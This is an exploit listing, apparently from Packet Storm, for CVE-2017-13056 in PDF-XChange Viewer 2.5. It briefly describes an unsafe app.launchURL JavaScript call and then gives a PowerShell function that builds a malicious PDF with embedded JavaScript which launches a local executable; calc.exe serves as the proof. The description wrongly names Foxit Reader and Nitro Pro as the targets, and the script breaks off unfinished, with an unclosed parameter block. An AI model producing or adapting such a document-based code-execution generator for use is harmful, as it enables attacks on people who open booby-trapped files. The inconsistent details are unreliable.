PDF-XChange Viewer 2.5 (Build 314.0) Code Execution

Type packetstorm
Reporter Daniele Votta
Modified 2017-08-24T00:00:00


                                            `# Exploit Title: PDF-XChange Viewer 2.5 (Build 314.0) Javascript API Remote Code Execution Exploit (Powershell PDF Exploit Creation)  
# Date: 21-08-2017  
# Software Link 32bit: http://pdf-xchange-viewer.it.uptodown.com/windows  
# Exploit Author: Daniele Votta  
# Contact: vottadaniele@gmail.com  
# Website: https://www.linkedin.com/in/vottadaniele/  
# CVE: 2017-13056  
# Category: PDF Reader RCE  
1. Description  
This module exploits an unsafe Javascript API implemented in PDF-XChange Viewer.   
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader.   
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.  
The specific flaw exists within app.launchURL method. The issue results from the lack of proper validation of a user-supplied string  
before using it to execute a system call. An attacker can leverage this vulnerability to execute code under the context of the current process.  
The launchURL() function allows an attacker to execute local files on the file system and bypass the security dialog.  
2. Proof of Concept (Generate evil PDF that start calc.exe)   
Step 1: Customize New-PDFjs.ps1 (custom params + PdfSharp-WPF.dll path)  
Step 2: Execute Windows PowerShell: PS C:\Users\User> New-PDFJS  
Step 3: Open the generated PDF with Nitro Pro PDF Reader  
3. PDF Generation:  
function New-PDFJS {  
# Use the desidered params  
Param (  
[string]$js ="app.launchURL('C:\\Windows\\System32\\calc.exe')",  
[string]$msg = "Hello PDF",  
[string]$filename = "C:\Users\User\Desktop\calc.pdf"  
# Use the PDFSharp-WPF.dll library path  
Add-Type -Path C:\Users\Daniele\Desktop\PdfSharp-WPF.dll  
$doc = New-Object PdfSharp.Pdf.PdfDocument  
$doc.Info.Title = $msg  
$doc.info.Creator = "AnonymousUser"  
$page = $doc.AddPage()  
$graphic = [PdfSharp.Drawing.XGraphics]::FromPdfPage($page)  
$font = New-Object PdfSharp.Drawing.XFont("Courier New", 20, [PdfSharp.Drawing.XFontStyle]::Bold)  
$box = New-Object PdfSharp.Drawing.XRect(0,0,$page.Width, 100)  
$graphic.DrawString($msg, $font, [PdfSharp.Drawing.XBrushes]::Black, $box, [PdfSharp.Drawing.XStringFormats]::Center)  
$dictjs = New-Object PdfSharp.Pdf.PdfDictionary  
$dictjs.Elements["/S"] = New-Object PdfSharp.Pdf.PdfName ("/JavaScript")  
$dictjs.Elements["/JS"] = New-Object PdfSharp.Pdf.PdfStringObject($doc, $js);  
$dict = New-Object PdfSharp.Pdf.PdfDictionary  
$pdfarray = New-Object PdfSharp.Pdf.PdfArray  
$embeddedstring = New-Object PdfSharp.Pdf.PdfString("EmbeddedJS")  
$dict.Elements["/Names"] = $pdfarray  
$dictgroup = New-Object PdfSharp.Pdf.PdfDictionary  
$dictgroup.Elements["/JavaScript"] = $dict.Reference  
$doc.Internals.Catalog.Elements["/Names"] = $dictgroup